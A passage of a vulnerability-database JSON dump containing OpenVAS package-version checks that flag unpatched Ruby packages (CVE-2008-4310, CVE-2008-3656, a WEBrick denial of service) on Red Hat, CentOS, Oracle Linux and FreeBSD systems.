rpm:\"ruby~1.8.5~5.el5_2.6\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.8.5~5.el5_2.6\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.5~5.el5_2.6\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.5~5.el5_2.6\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~1.8.5~5.el5_2.6\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.5~5.el5_2.6\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.5~5.el5_2.6\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-rdoc\", rpm:\"ruby-rdoc~1.8.5~5.el5_2.6\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-ri\", rpm:\"ruby-ri~1.8.5~5.el5_2.6\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.5~5.el5_2.6\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.8.1~7.el4_7.2\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.1~7.el4_7.2\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.8.1~7.el4_7.2\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.1~7.el4_7.2\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.1~7.el4_7.2\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.1~7.el4_7.2\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.1~7.el4_7.2\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.1~7.el4_7.2\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:38:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4310", "CVE-2008-3656"], "description": "Check for the Version of irb", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:1361412562310880192", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880192", "type": "openvas", "title": "CentOS Update for irb CESA-2008:0981 centos4 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for irb CESA-2008:0981 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an extensible, interpreted, object-oriented, scripting language. It\n has features to process text files and to do system management tasks.\n\n Vincent Danen reported, that Red Hat Security Advisory RHSA-2008:0897\n did not properly address a denial of service flaw in the WEBrick (Ruby\n HTTP server toolkit), known as CVE-2008-3656. This flaw allowed a\n remote attacker to send a specially-crafted HTTP request to a WEBrick\n server that would cause the server to use excessive CPU time. This\n update properly addresses this flaw. (CVE-2008-4310)\n \n All Ruby users should upgrade to these updated packages, which contain a\n correct patch that resolves this issue.\";\n\ntag_affected = \"irb on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-December/015515.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880192\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0981\");\n script_cve_id(\"CVE-2008-4310\", \"CVE-2008-3656\");\n script_name( \"CentOS Update for irb CESA-2008:0981 centos4 x86_64\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of irb\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:39:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4310", "CVE-2008-3656"], "description": "Check for the Version of irb", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:1361412562310880120", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880120", "type": "openvas", "title": "CentOS Update for irb CESA-2008:0981 centos4 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for irb CESA-2008:0981 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an extensible, interpreted, object-oriented, scripting language. It\n has features to process text files and to do system management tasks.\n\n Vincent Danen reported, that Red Hat Security Advisory RHSA-2008:0897\n did not properly address a denial of service flaw in the WEBrick (Ruby\n HTTP server toolkit), known as CVE-2008-3656. This flaw allowed a\n remote attacker to send a specially-crafted HTTP request to a WEBrick\n server that would cause the server to use excessive CPU time. This\n update properly addresses this flaw. (CVE-2008-4310)\n \n All Ruby users should upgrade to these updated packages, which contain a\n correct patch that resolves this issue.\";\n\ntag_affected = \"irb on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-December/015514.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880120\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0981\");\n script_cve_id(\"CVE-2008-4310\", \"CVE-2008-3656\");\n script_name( \"CentOS Update for irb CESA-2008:0981 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of irb\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4310", "CVE-2008-3656"], "description": "Check for the Version of irb", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:880120", "href": "http://plugins.openvas.org/nasl.php?oid=880120", "type": "openvas", "title": "CentOS Update for irb CESA-2008:0981 centos4 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for irb CESA-2008:0981 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an extensible, interpreted, object-oriented, scripting language. It\n has features to process text files and to do system management tasks.\n\n Vincent Danen reported, that Red Hat Security Advisory RHSA-2008:0897\n did not properly address a denial of service flaw in the WEBrick (Ruby\n HTTP server toolkit), known as CVE-2008-3656. This flaw allowed a\n remote attacker to send a specially-crafted HTTP request to a WEBrick\n server that would cause the server to use excessive CPU time. This\n update properly addresses this flaw. (CVE-2008-4310)\n \n All Ruby users should upgrade to these updated packages, which contain a\n correct patch that resolves this issue.\";\n\ntag_affected = \"irb on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-December/015514.html\");\n script_id(880120);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0981\");\n script_cve_id(\"CVE-2008-4310\", \"CVE-2008-3656\");\n script_name( \"CentOS Update for irb CESA-2008:0981 centos4 i386\");\n\n script_summary(\"Check for the Version of irb\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4310"], "description": "Oracle Linux Local Security Checks ELSA-2008-0981", "modified": "2018-09-28T00:00:00", "published": "2015-10-08T00:00:00", "id": "OPENVAS:1361412562310122539", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122539", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2008-0981", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2008-0981.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122539\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-08 14:47:34 +0300 (Thu, 08 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2008-0981\");\n script_tag(name:\"insight\", value:\"ELSA-2008-0981 - ruby security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2008-0981\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2008-0981.html\");\n script_cve_id(\"CVE-2008-4310\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.5~5.el5_2.6\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.5~5.el5_2.6\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.5~5.el5_2.6\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~1.8.5~5.el5_2.6\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.5~5.el5_2.6\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.5~5.el5_2.6\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-rdoc\", rpm:\"ruby-rdoc~1.8.5~5.el5_2.6\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-ri\", rpm:\"ruby-ri~1.8.5~5.el5_2.6\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.5~5.el5_2.6\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-07-02T21:10:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3905", "CVE-2008-3656"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-29T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:61452", "href": "http://plugins.openvas.org/nasl.php?oid=61452", "type": "openvas", "title": "FreeBSD Ports: ruby, ruby+pthreads, ruby+pthreads+oniguruma, ruby+oniguruma", "sourceData": "#\n#VID f7ba20aa-6b5a-11dd-9d79-001fc61c2a55\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n ruby\n ruby+pthreads\n ruby+pthreads+oniguruma\n ruby+oniguruma\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/\nhttp://www.vuxml.org/freebsd/f7ba20aa-6b5a-11dd-9d79-001fc61c2a55.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(61452);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_version(\"$Revision: 4175 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-29 07:45:50 +0200 (Thu, 29 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3905\");\n script_name(\"FreeBSD Ports: ruby, ruby+pthreads, ruby+pthreads+oniguruma, ruby+oniguruma\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"ruby\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.8.*,1\")>=0 && revcomp(a:bver, b:\"1.8.6.111_5,1\")<0) {\n txt += 'Package ruby version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"1.9.*,1\")>=0) {\n txt += 'Package ruby version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ruby+pthreads\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.8.*,1\")>=0 && revcomp(a:bver, b:\"1.8.6.111_5,1\")<0) {\n txt += 'Package ruby+pthreads version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"1.9.*,1\")>=0) {\n txt += 'Package ruby+pthreads version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ruby+pthreads+oniguruma\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.8.*,1\")>=0 && revcomp(a:bver, b:\"1.8.6.111_5,1\")<0) {\n txt += 'Package ruby+pthreads+oniguruma version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"1.9.*,1\")>=0) {\n txt += 'Package ruby+pthreads+oniguruma version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ruby+oniguruma\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.8.*,1\")>=0 && revcomp(a:bver, b:\"1.8.6.111_5,1\")<0) {\n txt += 'Package ruby+oniguruma version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"1.9.*,1\")>=0) {\n txt += 'Package ruby+oniguruma version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3905", "CVE-2008-3656"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-29T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:61451", "href": "http://plugins.openvas.org/nasl.php?oid=61451", "type": "openvas", "title": "FreeBSD Ports: 